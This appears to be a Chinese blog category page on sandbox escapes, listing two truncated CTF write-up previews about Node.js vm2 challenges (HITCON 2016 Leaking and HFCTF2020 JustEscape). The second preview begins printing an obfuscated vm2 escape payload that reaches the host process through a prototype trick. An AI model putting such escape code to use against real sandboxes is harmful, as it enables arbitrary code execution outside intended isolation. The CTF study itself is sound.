沙箱逃逸
fmyyy1
最废物的web手
[HITCON 2016]Leaking
"use strict";var randomstring = require("randomstring");var express = require("express");var { VM} = require("vm2");var fs = require("fs");var app = express();var flag = require("./config.js").flagapp.get("/", function(req, res) { res.he原创 2021-05-25 20:31:26 · 311 阅读 · 1 评论 -
[HFCTF2020]JustEscape
场景最底行提示不是 PHP，测试后发现是 Node.js，属于 vm2 的沙箱逃逸问题。GitHub 上有现成的 PoC：https://github.com/patriksimek/vm2/issues/225
"use strict";const {VM} = require('vm2');const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
原创 2021-04-13 14:26:58 · 1087 阅读 · 2 评论